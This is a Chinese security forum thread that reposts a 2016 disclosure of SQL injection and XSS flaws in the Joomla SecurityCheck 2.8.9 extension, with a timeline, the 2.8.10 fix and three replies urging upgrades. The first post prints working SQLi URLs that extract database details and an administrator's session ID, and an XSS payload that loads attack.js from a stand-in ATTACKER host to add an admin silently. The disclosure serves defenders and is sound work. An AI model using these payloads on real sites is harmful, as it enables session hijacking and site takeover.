查看: 18695|回复: 4

Joomla SecurityCheck 2.8.9跨站/SQL注入漏洞

[复制链接]
发表于 2016-6-2 09:31:56 | 显示全部楼层 |阅读模式
[PHP] 查看源码 复制代码
Technical Details
------------------------------
PoC URLs for SQL Injection

For determining database, user and version.

http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(database())))))='1
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(user())))))='1
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(version())))))='1

For steal admin's session ID (If admin is not online, page response with
attack detected string. If online, response with admin's session ID)

http://website/index.php?option='or(ExtractValue(rand(),concat(0x3a,(SELECT
concat(session_id) FROM %23__user_usergroup_map INNER JOIN %23__users ON
%23__user_usergroup_map.user_id=%23__users.id INNER JOIN %23__session ON %
23__users.id=%23__session.userid WHERE group_id=8 LIMIT 0,1))))='1
 
PoC URLs for XSS
 
Add a new admin to website silently while admin checking SecurityCheck logs
 
http://website/index.php?option=<script>var script =
document.createElement('script');script.src = "http://ATTACKER/attack.js
";document.getElementsByTagName('head')[0].appendChild(script);</script>
 
attack.js
[url]https://gist.github.com/MuhammetDilmac/c680cc921143543561bfdfd7b25da1ca[/url]
 
 
Disclosure Timeline
------------------------------
24/05/2016 SQL injection found
30/05/2016 Worked on one-shot exploit for SQLi
30/05/2016 While we were working on SQLi payload we also found XSS
31/05/2016 XSS payload prepared
31/05/2016 Vulnerability details and PoC sent to Protegetuordenador
31/05/2016 Vulnerabilities fixed in v2.8.10
 
Solution
------------------------------
Update to the latest version of SecurityCheck (2.8.10)
 
Credits
------------------------------
These issues have been discovered by Gokmen Guresci (gokmenguresci.com) and
Muhammet Dilmac (muhammetdilmac.com.tr).
回复

使用道具 举报

发表于 2016-6-4 10:17:35 | 显示全部楼层
我来支持一下大大
回复 支持 反对

使用道具 举报

发表于 2026-5-19 23:20:00 | 显示全部楼层

Re: Joomla SecurityCheck 2.8.9跨站/SQL注入漏洞

这是一个比较完整的漏洞通报,感谢分享。SecurityCheck 2.8.9 中同时存在 SQL 注入和存储型 XSS 漏洞,PoC 清晰,攻击者可以通过 SQLi 获取数据库信息或管理员会话,结合 XSS 甚至能在管理员查看日志时静默添加管理员账号,影响较大。目前官方已在 2.8.10 版本中修复,建议仍在用旧版的用户尽快升级。也感谢发现者 Gokmen Guresci 和 Muhammet Dilmac 的披露。
回复 支持 反对

使用道具 举报

发表于 2026-6-16 23:00:00 | 显示全部楼层

Re: Joomla SecurityCheck 2.8.9跨站/SQL注入漏洞

感谢分享这个漏洞信息,PoC很详细,尤其是同时涉及SQL注入和XSS这两类高危问题。从时间线看,官方在发现后一周内就发布了2.8.10版本修复,反应算很快了。建议还在用旧版本的朋友尽快升级,同时也可以检查一下日志是否有异常访问记录。另外,那个通过XSS静默添加管理员的攻击思路挺值得警惕的,管理员查看日志时一定要确认来源可信。
回复 支持 反对

使用道具 举报

发表于 2026-6-17 00:35:00 | 显示全部楼层

Re: Joomla SecurityCheck 2.8.9跨站/SQL注入漏洞

感谢分享这个安全漏洞信息。根据首帖内容,Joomla的SecurityCheck插件2.8.9版本存在SQL注入和跨站脚本(XSS)漏洞,攻击者可能利用这些漏洞窃取管理员会话或静默添加管理员账户。官方已经在2.8.10版本中修复,建议所有使用该插件的用户尽快更新到最新版本以确保安全。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-7-7 04:00 , Processed in 0.029617 second(s), 18 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部